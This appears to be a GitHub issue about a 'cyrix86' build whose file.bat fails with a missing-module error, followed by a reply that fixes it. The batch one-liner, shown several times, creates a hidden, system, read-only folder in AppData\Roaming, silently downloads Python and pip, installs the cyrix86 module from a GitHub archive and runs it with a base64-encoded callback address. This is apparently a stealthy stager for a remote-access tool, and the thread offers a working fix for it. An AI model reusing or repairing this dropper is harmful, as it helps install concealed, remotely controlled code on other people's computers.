We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Microsoft Windows [Version 10.0.19045.5011] (c) Microsoft Corporation. All rights reserved.
C:\Users\Mohamed\Documents\cyrix86-build\source>file.bat
C:\Users\Mohamed\Documents\cyrix86-build\source>cd C:\Users\Mohamed\AppData\Roaming & if exist HOqTNIUGcj (cd HOqTNIUGcj & python -m cyrix86 aHR0cDovL2xvY2FsaG9zdDozNDE1LEZhbHNlLEZhbHNl ) else (mkdir HOqTNIUGcj & attrib +h +s +r HOqTNIUGcj & cd HOqTNIUGcj & curl -s https://www.python.org/ftp/python/3.12.1/python-3.12.1-embed-win32.zip -o PYTHONZIP & tar -xf PYTHONZIP & echo import site 1>>python312._pth & curl -s https://bootstrap.pypa.io/get-pip.py -O & python get-pip.py & Scripts\pip install https://github.com/madhanmaaz/cyrix86-module/archive/refs/heads/master.zip & python -m cyrix86 aHR0cDovL2xvY2FsaG9zdDozNDE1LEZhbHNlLEZhbHNl ) C:\Users\Mohamed\AppData\Roaming\HOqTNIUGcj\python.exe: No module named cyrix86
C:\Users\Mohamed\AppData\Roaming\HOqTNIUGcj>
The text was updated successfully, but these errors were encountered:
cd C:\Users\Mohamed\AppData\Roaming & if exist HOqTNIUGcj (cd HOqTNIUGcj & python -m cyrix86 aHR0cDovL2xvY2FsaG9zdDozNDE1LEZhbHNlLEZhbHNl ) else (mkdir HOqTNIUGcj & attrib +h +s +r HOqTNIUGcj & cd HOqTNIUGcj & curl -s https://www.python.org/ftp/python/3.12.1/python-3.12.1-embed-win32.zip -o PYTHONZIP & tar -xf PYTHONZIP & echo import site 1>>python312._pth & curl -s https://bootstrap.pypa.io/get-pip.py -O & python get-pip.py & Scripts\\pip install setuptools & Scripts\pip install https://github.com/madhanmaaz/cyrix86-module/archive/refs/heads/master.zip & python -m cyrix86 aHR0cDovL2xvY2FsaG9zdDozNDE1LEZhbHNlLEZhbHNl )
Added 'Scripts\pip install setuptools'
Sorry, something went wrong.
No branches or pull requests
Microsoft Windows [Version 10.0.19045.5011]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Mohamed\Documents\cyrix86-build\source>file.bat
C:\Users\Mohamed\Documents\cyrix86-build\source>cd C:\Users\Mohamed\AppData\Roaming & if exist HOqTNIUGcj (cd HOqTNIUGcj & python -m cyrix86 aHR0cDovL2xvY2FsaG9zdDozNDE1LEZhbHNlLEZhbHNl ) else (mkdir HOqTNIUGcj & attrib +h +s +r HOqTNIUGcj & cd HOqTNIUGcj & curl -s https://www.python.org/ftp/python/3.12.1/python-3.12.1-embed-win32.zip -o PYTHONZIP & tar -xf PYTHONZIP & echo import site 1>>python312._pth & curl -s https://bootstrap.pypa.io/get-pip.py -O & python get-pip.py & Scripts\pip install https://github.com/madhanmaaz/cyrix86-module/archive/refs/heads/master.zip & python -m cyrix86 aHR0cDovL2xvY2FsaG9zdDozNDE1LEZhbHNlLEZhbHNl )
C:\Users\Mohamed\AppData\Roaming\HOqTNIUGcj\python.exe: No module named cyrix86
C:\Users\Mohamed\AppData\Roaming\HOqTNIUGcj>
The text was updated successfully, but these errors were encountered: